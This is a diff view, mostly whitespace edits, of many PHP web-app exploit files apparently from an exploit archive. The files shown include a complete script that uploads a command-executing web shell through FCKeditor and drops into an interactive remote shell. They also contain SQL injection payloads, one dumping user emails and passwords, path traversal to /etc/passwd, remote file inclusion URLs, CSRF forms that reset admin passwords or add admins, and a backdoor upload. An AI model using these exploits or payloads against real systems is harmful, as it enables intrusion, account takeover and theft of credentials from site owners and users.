[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN
[x] Software Link: [http://www.familycms.com/getstarted.php]
[x] Version: [v 2.2.3 ]
[x]Tested on: [Windows XP]
@ -11,4 +11,4 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x]Greetings:  No Greet
[x]Greetings: No Greet

60
exploits/php/webapps/15389.php
View file

@ -19,34 +19,34 @@ set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
 print "\nUsage......: php $argv[0] metinfo.pe path";
 print "\nExample....: php $argv[0] localhost /fckeditor/\n";
 die();
print "\nUsage......: php $argv[0] metinfo.pe path";
print "\nExample....: php $argv[0] localhost /fckeditor/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data  = "--xSsT0rm\r\n";
$data = "--xSsT0rm\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "----xSsT0rm--\r\n";
$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
@ -58,19 +58,19 @@ else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\nsh3n-box# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $output = http_send($host, $packet);
  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $output);
  print "\n{$shell[1]}";
 }
 else break;
print "\nsh3n-box# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>

2
exploits/php/webapps/15470.txt
View file

@ -8,4 +8,4 @@ Sql Injection :
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
################################################################################################################
Thanks Cyber-Warrior.org & AKINCILAR
################################################################################################################ 
################################################################################################################

2
exploits/php/webapps/15472.txt
View file

@ -18,7 +18,7 @@ Description: Change the admin password of the admin panel of oscommerce.And then
<form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
Username<br><input type="text" name="username" value="admin">
<br>Password<br><input type="password" name="password" maxlength="40"></td>
<br><input type="submit" alt="Update" title=" Update " value="Change It!">  <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
<br><input type="submit" alt="Update" title=" Update " value="Change It!"> <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
</form>
</BODY></HTML>
----------------------------

4
exploits/php/webapps/15510.txt
View file

@ -1,6 +1,6 @@
[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
[+]Date: [13-11-2010]
[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[+]Author: LoSt.HaCkEr ~ aDaM_TRoJaN
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.1]
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:  No Greet  !_!
Greetings: No Greet !_!

8
exploits/php/webapps/15685.html
View file

@ -104,7 +104,7 @@ Hide Email ? (Email Göster Gizle)
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type=radio name="posta_goster" value="1" >
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="posta_goster" value="0" checked="checked">
Hayýr</label>
@ -115,7 +115,7 @@ Doðum tarihi
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="dogum_tarihi_goster" value="0" >
@ -127,7 +127,7 @@ Sehir Göster Gizle
<td class="liste-veri3" bgcolor="#ffffff" align="left">
<label style="cursor: pointer;">
<input type="radio" name="sehir_goster" value="1" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
@ -145,7 +145,7 @@ Online - Offline Göster Gizle
<label style="cursor: pointer;">
<input type="radio" name="gizli" value="0" checked="checked">
Evet</label>  
Evet</label>
<label style="cursor: pointer;">
<input type="radio" name="gizli" value="1" >

2
exploits/php/webapps/15824.txt
View file

@ -4,7 +4,7 @@ Special thanks to Eric Heikkinen for patching these quickly.
Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
XSS:

2
exploits/php/webapps/15838.php
View file

@ -16,7 +16,7 @@ The target must be a link to the document root of OpenClassifieds<br>
(If the exploit doesn't immediately reload then blind sqli is
required, which will take a few minutes ;)<br>
<form>
Target:  <input size=128 name=target value="http://localhost/"><br>
Target: <input size=128 name=target value="http://localhost/"><br>
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
<input type=submit value="Attack">
</form><br>

2
exploits/php/webapps/15857.txt
View file

@ -401,7 +401,7 @@ report.php
$url = " .$_SERVER[PHP_SELF]";
$count = $row[0];
$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
print("<BR><b> Current Email Bans ($count)</b>\n");
print("<BR><b> Current Email Bans ($count)</b>\n");
$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.

14
exploits/php/webapps/15902.html
View file

@ -27,11 +27,11 @@ expl:
</tr>
<tr>
<td align="left" valign="top">Root URL address of your site (with end slash)</td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top">Your slogan</td>
@ -90,19 +90,19 @@ expl:
</tr>
<tr>
<td align="left" valign="top">Password-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top">Password again-----just 6 characters</td></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
<td align="left" valign="top"> </td>
<td align="left" valign="top"> </td>
</tr>
<tr>
<td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
@ -113,7 +113,7 @@ expl:
<td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
</tr>
<tr>
<td colspan="2" align="center" valign="top"> </td>
<td colspan="2" align="center" valign="top"> </td>
</tr>
</table>
</form>

8
exploits/php/webapps/16060.txt
View file

@ -12,12 +12,12 @@
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex
 
 
 
[POC]
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
 
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[SQL Injection]

2
exploits/php/webapps/16116.txt
View file

@ -17,7 +17,7 @@ Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
Jordan,Animacco,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
Rodrix, l0ve, her0
 
[Qcodo Exploit]

6
exploits/php/webapps/16127.txt
View file

@ -6,7 +6,7 @@
# Software: http://www.telematica.com.ar/tcms.asp
# http://www.telematica.com.ar/portfolio.asp
# Tested on: Linux
 
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
@ -15,8 +15,8 @@ Jordan,Animacco ,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
Rodrix, l0ve, NetT0xic,
Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
 
 
[Authentication Bypass]
http://path/admin/

2
exploits/php/webapps/17170.txt
View file

@ -75,7 +75,7 @@ EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanizat
<tr>
<td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
<tr>
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
<td height="25" colspan="2" class="fntstyle"> <?php echo $resprname1;?></td>
[/code]

2
exploits/php/webapps/17562.php
View file

@ -103,7 +103,7 @@ $post_bd = array(
"description"=>"bla bla bla ,,,","cat"=> 1,
"day"=> 22,"month"=> 11,"year"=>2011,
"picture"=>"@".realpath("dz.php"),
"submit"=>"  Update Event  ");
"submit"=>" Update Event ");
# post backdoor & check
echo (!eregi("<strong>Errors</strong>", DzCURL($target."admin_events.php",$post_bd,$header))) ? "# Backdoor uploaded :D\n":die("# Failed : can't upload Backdoor");

6
exploits/php/webapps/18236.txt
View file

@ -1,11 +1,11 @@
# Exploit Title: Pixie v1.04 blog post CSRF
# Google Dork: # Date: 11-Dec-2011
# Google Dork: # Date: 11-Dec-2011
# Author: hackme
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip 
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: 1.04# Tested on: Linux Ubuntu 10.10
# CVE :
[+] TH4NKZ T0: broiosen,ReGun and hackgame.it
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post 
[+] Vulnerable Url: http://host.com/pixie/?s=blog&m=permalink&x=my-first-post
[+] Post Method
[+] exploit:

10
exploits/php/webapps/18466.txt
View file

@ -7,15 +7,15 @@
# http://www.tubeace.com
# Tested on: Linux
# Dork: "?viewStandard=0"
 
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]

2
exploits/php/webapps/18495.html
View file

@ -11,7 +11,7 @@
<center><b><font face="Tahoma" size="5">[ <font color="#FF0000">Priv8</font> ]
<span dir="ltr"><font color="#FF0000">Almnzm 2.4</font><font color="#ffffff">
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
</font></span> CSRF Exploit!! </font><font face="Tahoma" size="2">>></font><font face="Tahoma" size="5"> </font>
<font color="#FF0000" face="Tahoma" size="2">Add New Admin :D</font></b></p>
<p align="center"><b><font face="Tahoma">By: <font color="#FF0000">HaNniBaL
KsA</font> (<font color="#FF0000">HK</font>)</font></b></p><center>

2
exploits/php/webapps/18711.txt
View file

@ -77,7 +77,7 @@ setTimeout('document.test.submit()',0);
<input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
</p>
<p><input type="submit" name="Change" value="Change" />
  </p>
</p>
</form>
</body>
</html>

2
exploits/php/webapps/18742.php
View file

@ -113,7 +113,7 @@ Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
<!-- buttons start -->
<table width="100%" cellpadding="5" border="0">
<tr>
<td width="80"> </td>
<td width="80"> </td>
<td align="right">
<input type="submit" name="Save" value="Save" style="width:80px;">
</td>

20
exploits/php/webapps/18743.txt
View file

@ -7,23 +7,23 @@
# http://www.mediaxxxscript.com/
# Tested on: Linux
# Dork: "Powered by MediaXxx Mobile"
  
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,ksha,zerial,
    her0, r0dr1 y demas user de RemoteExecution
    wwwremoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
 
her0, r0dr1 y demas user de RemoteExecution
wwwremoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
 
http://localhost/mobile/search?query=[SQL Injection]
 
 
[DEMO]
 
http://server/mobile/search?query=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C122%2C108%2C118%2C58%29%2C%28CASE%20WHEN%20%28EXISTS%28SELECT%209%20FROM%20information_schema.TABLES%29%29%20THEN%201%20ELSE%200%20END%29%2CCHAR%2858%2C113%2C103%2C116%2C58%29%29%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTgy%27%3D%27CTgy
-------------------------

12
exploits/php/webapps/18900.txt
View file

@ -102,15 +102,15 @@ Content-Type: text/html
</tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
<tr><td> </td><td>
<input type="submit" name="action" class="bluebox" value="Update" /> 
<tr><td> </td><td></td></tr>
<tr><td> </td><td>
<input type="submit" name="action" class="bluebox" value="Update" />
<input type="submit" name="action" class="bluebox" value="Delete"
onClick="javascript:return confirm('Really DELETE this end-device record?')"
/>
</td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
</td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:

8
exploits/php/webapps/19549.txt
View file

@ -18,11 +18,11 @@ Project CHAP Security
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
 
[PoC]
http://localhost/classified-listing.php?catId=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

10
exploits/php/webapps/20055.txt
View file

@ -8,15 +8,15 @@ Date: 23/07/2012
# www.chap.cl
# Este Advisory fue reportado por Daniel Godoy, integrante deProject CHAP Security
# be secured /stay secure
# contacto@chap.cl 
# contacto@chap.cl
[Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,Maximiliano Soler, Pablin77,_tty0,
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp    her0, r0dr1 y demas user de RemoteExecution   
www.remoteexecution.info www.remoteexcution.com.ar   
#RemoteExecution Hacking Group   
Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha, zerial,LinuxFer,Scorp her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
find Squid's access.log file path and insert "> Example: ">PWNED!
find Squid's access.log file path and insert "> Example: ">PWNED!
http://server/mysar/www/?a=administration

2
exploits/php/webapps/20671.html
View file

@ -9,5 +9,5 @@
<form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
<input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
<font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
<input type="submit" value="Save"></td></tr></table></form></div>

4
exploits/php/webapps/24953.txt
View file

@ -39,14 +39,14 @@ Vulnerable page : http://target.com/[path]/admin/file_io.php
<td width="300" height="50" align="center" valign="middle">
<font color="#808080">New Username:</font>
</td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40">  </td>
<td width="345" height="50" align="left" valign="middle"><input name="user_name" type="text" size="40"> </td>
</tr>
</td>
<tr>
<td width="300" height="62" align="center" valign="middle">
<font color="#808080">New Password: </font> </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40">  </td>
<td width="345" height="62" align="left" valign="middle"><input name="password" type="text" size="40"> </td>
</tr>
<tr>
<td height="50" colspan="2" align="center" valign="middle" ><p>

6
exploits/php/webapps/25245.txt
View file

@ -77,7 +77,7 @@ type="password" value="abdotv"/></td>
</tr>
<tr>
<td valign="top"> </td>
<td valign="top"> </td>
<td><table border="0" cellspacing="0"
cellpadding="2">
<tr>
@ -86,7 +86,7 @@ cellpadding="2">
<input type="submit"
value="Submit" name="btn_submit" >
</td>
<td width="6"> </td>
<td width="6"> </td>
</tr>
</table></td>
</tr>
@ -109,7 +109,7 @@ value="Submit" name="btn_submit" >
<td width="3%" align="left" background="images/layoutadmin_109.jpg"
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
width="33" height="20" alt="" /></td>
<td background="images/layoutadmin_109.jpg"> </td>
<td background="images/layoutadmin_109.jpg"> </td>
<td width="3%" align="right"
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
><img src="images/layoutadmin_111.jpg" width="33" height="20" alt=""/></td>

22
exploits/php/webapps/26366.txt
View file

@ -59,9 +59,9 @@ Error: You have an error in your SQL syntax; check the manual that corresponds t
AND `glpi_tickets`.`is_deleted` = 0
' at line 3
Backtrace :
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
/var/www/html/glpi/inc/db.function.php :288 DBmysql->query()
/var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable()
/var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech()
/var/www/html/glpi/ajax/ticketassigninformation.php
@ -98,11 +98,11 @@ WHERE `ext` LIKE \'1\'\'
AND `is_uploadable`=\'1\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3
Backtrace :
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
/var/www/html/glpi/inc/document.class.php :1232 DBmysql->query()
/var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc()
/var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument()
/var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate()
/var/www/html/glpi/front/document.form.php :99 CommonDBTM->update()
/var/www/html/glpi/front/document.form.php
@ -121,9 +121,9 @@ Backtrace :
SQL: SHOW TABLES LIKE \'%glpi_users\'%\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
Backtrace :
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
/var/www/html/glpi/ajax/comments.php :47 TableExists()
/var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query()
/var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables()
/var/www/html/glpi/ajax/comments.php :47 TableExists()
/var/www/html/glpi/ajax/comments.php
======================================================================

6
exploits/php/webapps/28668.txt
View file

@ -1,9 +1,9 @@
source: https://www.securityfocus.com/bid/20202/info
 
BirdBlog is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
 
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
 
BirdBlog 1.4.0 and prior versions are reported vulnerable.
http://www.example.com/[path]/index.php?page=<Script>

Some files were not shown because too many files have changed in this diff Show more